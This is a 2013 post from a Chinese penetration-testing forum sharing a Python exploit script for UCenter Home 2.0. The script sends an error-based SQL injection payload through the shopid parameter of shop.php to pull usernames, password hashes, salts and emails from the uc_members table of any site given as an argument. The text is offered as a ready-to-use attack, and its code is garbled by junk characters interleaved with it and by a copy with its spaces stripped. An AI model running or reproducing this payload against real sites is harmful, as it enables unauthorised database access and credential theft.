找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2202|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
3 W* x+ w; |; L% F6 l0 A
* D; v& q* A! W) U4 E- {0 I( S) x
#!/usr/bin/env python  6 b  t1 O. A2 u; p
9 U. G2 E4 C2 J: V( |0 z
import sys  
  R3 t$ Z4 \, x1 n. s/ d6 o5 Bimport urllib2  % \' C4 m- N. o( f
import re  
9 x& l  U- f/ a* @. B: Q : H8 K" r4 C0 |0 n4 k4 R
def info():  $ D  D; t2 Y! m$ h/ K6 {2 n
    print 'From:http://www.exploit-db.com/exploits/14997/'
: e4 J3 Z4 O) ^    print 'http://www.hake.cc/Web_loudong/'
5 _! d1 x0 M& I  Y# |1 u    print 'changed:qiaoy'  4 u& \! V" ~8 x, B# I7 L- G
    print 'exp:'  , B. d1 S( K- R* H& T3 n
    print ' ./UCenter_Home_2.0.py site'  7 J" O7 ]4 ?7 A, g

1 P0 j! w* c3 B  L5 ~def main():  2 ^" a" D- j2 v$ y8 S
    if len(sys.argv) != 2:  
; {5 p5 \& ^+ K( A  t8 c        info()  ; m0 D# U+ [& p: ]0 P! l& G
    else:  
0 K5 r+ e; ^2 K8 J/ B# T! ]9 e        site = sys.argv[1]  
  g$ b2 p7 R/ P% g        if site[0:7] == 'http://':  
- O& O& z( i$ P            sitesite =site  1 E9 ^8 X/ ]% I6 G$ X8 L% F+ l
        elif site[0:8] == 'https://':  
  V  g7 f5 `. ], W* N            sitesite = site  
3 j- ~$ ]- [: q        else:  
4 j' ~, W7 L1 d* K            site = 'http://'+site  
8 H# r' Z" [7 d8 f; [( v        try:  
6 S3 n2 A8 }) F. E( `9 u            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
( E: u, x6 u  w. ?+ E2 v2 w            Value = urllib2.urlopen(url).read()  & q( v) C, [( S7 S% U5 C* a
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
- v" k  ~; F9 S            hacked = Msg.split(':')  - d$ v/ x4 B, g0 n1 ~: V5 z
            print 'Name:    '+hacked[1]  ) V; g$ h$ g9 `% H( w
            print 'Passwd:  '+hacked[2]  
+ X6 s! w  s0 t' O0 w            print 'salt:    '+hacked[3]  
3 O! \+ |3 I/ q# `. v+ n            print 'email:   '+hacked[4]  ; |0 A( x9 j7 [
        except:  
6 s" g8 c; W9 C+ p( H) X7 d            print 'Sorry,I can\'t work............'  4 x$ G" a. V1 A( I4 s& t# C
5 K# x) ?7 R1 r$ F6 L6 e3 Z/ f
if __name__ == '__main__':  . m8 O9 c# I- y
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表